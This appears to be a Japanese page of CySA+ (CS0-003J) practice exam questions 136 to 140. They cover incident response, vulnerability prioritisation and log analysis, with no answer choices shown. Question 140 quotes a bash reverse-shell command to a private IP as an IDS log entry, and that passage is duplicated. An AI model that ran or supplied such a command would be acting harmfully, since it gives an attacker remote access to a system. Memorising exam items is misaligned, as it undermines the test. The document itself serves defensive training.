CS0-003J 試験問題 136
インシデント管理イベント中に法務チームが負う責任は次のどれですか? (2 つ選択してください。)
CS0-003J 試験問題 137
セキュリティ アナリストは、企業の Web アプリケーションに関する最新の脆弱性レポートの調査結果を検討しています。Web アプリケーションは、ファイルが指定されたハッシュと一致する場合に、Bash スクリプトの処理用のファイルを受け入れます。ハッシュの衝突により、アナリストはシステムにファイルを送信できます。現在のスクリプトとインフラストラクチャへの変更を最小限に抑えて脆弱性を軽減するには、アナリストは次のどれを提案すべきですか?
CS0-003J 試験問題 138
セキュリティ アナリストは最新の脆弱性スキャンをレビューし、同様の CVSSv3 スコアを持つが基本スコア メトリックが異なる脆弱性があることを観察しました。アナリストは次の攻撃ベクトルのうちどれを最初に修正する必要がありますか?
CS0-003J 試験問題 139
組織が侵害され、全従業員のユーザー名とパスワードがオンラインに流出しました。この状況の影響を軽減できる修復策を最もよく説明しているものは次のうちどれですか?
CS0-003J 試験問題 140
セキュリティ アナリストは、ホストベースの IDS ログで次の疑わしいエントリを特定しました。
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
アクティビティが進行中かどうかを最も正確に確認するためにアナリストが使用する必要があるシェル スクリプトは次のどれですか。
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
アクティビティが進行中かどうかを最も正確に確認するためにアナリストが使用する必要があるシェル スクリプトは次のどれですか。